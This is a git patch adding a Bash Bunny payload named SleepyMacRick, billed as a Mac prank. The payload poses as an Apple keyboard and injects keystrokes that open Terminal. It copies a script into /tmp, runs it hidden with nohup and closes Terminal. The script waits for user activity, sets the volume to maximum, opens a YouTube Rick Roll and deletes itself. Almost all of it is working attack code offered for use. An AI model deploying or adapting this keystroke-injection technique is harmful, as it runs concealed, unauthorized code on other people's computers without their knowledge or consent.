From 2c9b668bfad72490e07f67023c0e8c91b2228620 Mon Sep 17 00:00:00 2001
From: 90N45 <79598596+90N45-d3v@users.noreply.github.com>
Date: Sun, 10 Sep 2023 13:40:44 +0200
Subject: [PATCH] Add SleepyMacRick
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered.
---
 .../library/prank/SleepyMacRick/README.md     | 17 +++++++++++++
 .../library/prank/SleepyMacRick/payload.txt   | 25 +++++++++++++++++++
 payloads/library/prank/SleepyMacRick/rick.sh  | 14 +++++++++++
 3 files changed, 56 insertions(+)
 create mode 100644 payloads/library/prank/SleepyMacRick/README.md
 create mode 100644 payloads/library/prank/SleepyMacRick/payload.txt
 create mode 100644 payloads/library/prank/SleepyMacRick/rick.sh

diff --git a/payloads/library/prank/SleepyMacRick/README.md b/payloads/library/prank/SleepyMacRick/README.md
new file mode 100644
index 00000000..ff8ada4c
--- /dev/null
+++ b/payloads/library/prank/SleepyMacRick/README.md
@@ -0,0 +1,17 @@
+# SleepyMacRick
+* Author: 90N45
+* Version: 1.0
+* Target: Mac
+* Attackmodes: HID, STORAGE
+
+### Description
+Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered. 
+
+### Status
+| LED | State |
+| --- | --- |
+| Magenta solid (SETUP) | Set ATTACKMODE |
+| Yellow single blink (ATTACK) | Setup and run script on the Mac |
+| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | „Rick Roll“ is ready and listening for activity |
+
+*Average runtime: 23 seconds*
\ No newline at end of file
diff --git a/payloads/library/prank/SleepyMacRick/payload.txt b/payloads/library/prank/SleepyMacRick/payload.txt
new file mode 100644
index 00000000..be19ac7d
--- /dev/null
+++ b/payloads/library/prank/SleepyMacRick/payload.txt
@@ -0,0 +1,25 @@
+#!/bin/bash
+
+LED SETUP
+ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
+
+LED ATTACK
+# Open terminal
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 1500
+
+QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/rick.sh /tmp/rick.sh"
+QUACK ENTER
+QUACK DELAY 1000
+
+QUACK STRING "diskutil eject /Volumes/BashBunny/"
+QUACK ENTER
+QUACK STRING "chmod +x /tmp/rick.sh && nohup bash /tmp/rick.sh &> /dev/null &"
+QUACK ENTER
+QUACK STRING "killall Terminal"
+QUACK ENTER
+
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/prank/SleepyMacRick/rick.sh b/payloads/library/prank/SleepyMacRick/rick.sh
new file mode 100644
index 00000000..3c9af0a5
--- /dev/null
+++ b/payloads/library/prank/SleepyMacRick/rick.sh
@@ -0,0 +1,14 @@
+#! /bin/bash
+
+sleep 3
+inactive=$(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name')
+
+while [[ ${inactive} = $(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name') ]]; do
+	sleep 0.5
+done
+
+osascript -e "set volume output volume 100"
+open -u "https://www.youtube.com/watch?v=xvFZjo5PgG0"
+
+# Self destruct
+rm /tmp/rick.sh
\ No newline at end of file